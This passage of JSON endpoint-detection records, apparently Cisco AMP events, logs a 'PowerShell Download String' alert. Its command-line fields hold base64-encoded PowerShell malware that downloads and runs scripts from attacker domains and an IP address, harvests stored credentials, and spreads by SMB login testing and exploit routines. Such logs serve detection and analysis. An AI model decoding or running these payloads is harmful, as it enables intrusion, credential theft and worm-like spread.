bwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20200719101800,"sig_rev":1},"detection":"apde:20200719101800","end_ts":1610640884,"engine":"apde","id":"cF3A8bacac","name":"PowerShell Download String","observables":{"file":[{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1},{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1}]},"remediated":false,"severity":"medium","silent":true,"start_ts":1610640884,"tactics":["TA0002","TA0005"],"techniques":["T1059"],"type":"activity","normalized":{"observables":{"file":{"name":["wmiprvse.exe","powershell.exe"],"path":["c:\\windows\\system32\\wbem","c:\\windows\\system32\\windowspowershell\\v1.0"]}},"name":"powershell download string"},"ts":1610640884},"tactics":["TA0002","TA0005"],"techniques":["T1059"]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":791000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"PowerShell Download String","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAA